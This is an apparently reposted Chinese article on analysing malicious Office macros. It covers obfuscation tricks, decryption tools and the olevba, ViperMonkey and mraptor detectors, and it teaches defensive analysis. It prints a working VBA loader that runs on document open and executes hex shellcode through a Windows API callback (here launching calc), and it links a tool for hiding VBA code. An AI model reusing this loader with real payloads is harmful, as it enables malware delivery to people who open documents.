江苏龙网

  1. 主页 > 生活百科 > >

恶意代码分析之Office宏代码分析( 二 )

Office宏


简单的混淆、反调试技术1.利用ActiveX触发器一个典型的例子:利用InkPicture1_Painted2.隐藏数据3.用于隐藏数据的word文档变量,文档变量可以存储多达64KB的数据,隐藏在MS Word用户界面中 。4.通过CallByName混淆函数调用https://msdn.microsoft.com/en-us/library/office/gg278760.aspx5.使用WMI运行命令6.调用powershell7.运行VBScript或者Jscript,运行VBS/JS代码而不将文件写入磁盘可参考文档:https://docs.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-6.0/aa227637(v=vs.60)?redirectedfrom=MSDN代码示例:https://www.experts-exchange.com/questions/28190006/VBA-ScriptControl-to-run-JAVA-Script-Function.html8.通过API回调运行shellcode
一例通过VBA运行shellcode的实例:
Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As LongPrivate Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As LongPrivate Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As LongPrivate Sub Document_Open()Dim shellCode As StringDim shellLength As ByteDim byteArray() As ByteDim memoryAddress As LongDim zL As LongzL = 0Dim rL As LongshellCode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500"shellLength = Len(shellCode) / 2ReDim byteArray(0 To shellLength)For i = 0 To shellLength - 1If i = 0 Thenpos = i + 1Elsepos = i * 2 + 1End IfValue = https://www.isolves.com/it/aq/sj/2020-07-02/Mid(shellCode, pos, 2)byteArray(i) = Val("&H" & Value)NextrL = createMemory(&H40000, zL, zL)memoryAddress = allocateMemory(rL, zL, &H5000)copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1executeResult = shellExecute(memoryAddress, zL)End Sub源代码来自:http://ropgadget.com/posts/abusing_win_functions.html代码的前四行用于引用系统库,调用系统API16行处是shellcode的十六进制编码,在这个例子中功能是打开计算器 。29行处是将shellcode的十六进制编码转换为二进制数据流36行处将shellcode copy到了buffer处38处执行了shellcode
关于office的加密在97到2003版本的时候,文件加密的概念还不流行,那个时候的宏代码几乎从来没有加密过,2007版本之后,才开始通过加密的方式将VBA代码保护起来分享两个解密的工具:https://github.com/nolze/msoffcrypto-toolhttps://github.com/herumi/msoffice
宏代码的分析工具1.1. 首先可以使用VBA编辑器(比如在office文档里面按alt + F11),通过VBA编辑器可以很方便的调试和跟踪这里不得不提一下从VBA编辑器隐藏VBA代码的技巧:https://github.com/outflanknl/EvilClippy
2.olevba:https://github.com/decalage2/oletools/wiki/olevba该工具可以有效的提取office文档中的宏代码,需要Python环境支持 。

恶意代码分析之Office宏代码分析

文章插图
 
上面这张图列举了olevba所支持的类型,和一些值得关注的地方,比如自动触发代码、一些危险的关键词(Downloads、File writes、Shell execution DLL calls等)、还有一些IOCs
当然很多时候静态分析不能解决问题,还是需要动态分析才能更好地了解恶意代码的功能 。这里分享一个软件ViperMonkey:https://github.com/decalage2/ViperMonkey
运行结构如下:
恶意代码分析之Office宏代码分析

文章插图
 
mraptormraptor是github上一个开源的宏代码检测项目https://github.com/decalage2/oletools/wiki/mraptor
大概介绍一下原理:mraptor有三个检测标准,分别是:A 自动执行(触发器)W 写入文件系统或内存X 在VBA上下文外执行文件或任何payload当某个office宏满足了A条件,那么W和X只要满足任意一条,则会被mraptor标注为恶意 。该项目依赖python环境,用法如下:
Usage: mraptor [options] <filename> [filename2 ...]Options:-h, --helpshow this help message and exit-rfind files recursively in subdirectories.-z ZIP_PASSWORD, --zip=ZIP_PASSWORDif the file is a zip archive, open all files from it,using the provided password (requires Python 2.6+)-f ZIP_FNAME, --zipfname=ZIP_FNAMEif the file is a zip archive, file(s) to be openedwithin the zip. Wildcards * and ? are supported.(default:*)-l LOGLEVEL, --loglevel=LOGLEVELlogging level debug/info/warning/error/critical(default=warning)-m, --matchesShow matched strings.An exit code is returned based on the analysis result: - 0: No macro - 1: Not MS Office - 2: Macro OK - 10: ERROR - 20: SUSPICIOUS


推荐阅读


上一篇:有史以来25个最伟大的Java应用程序

下一篇:插入排序算法解析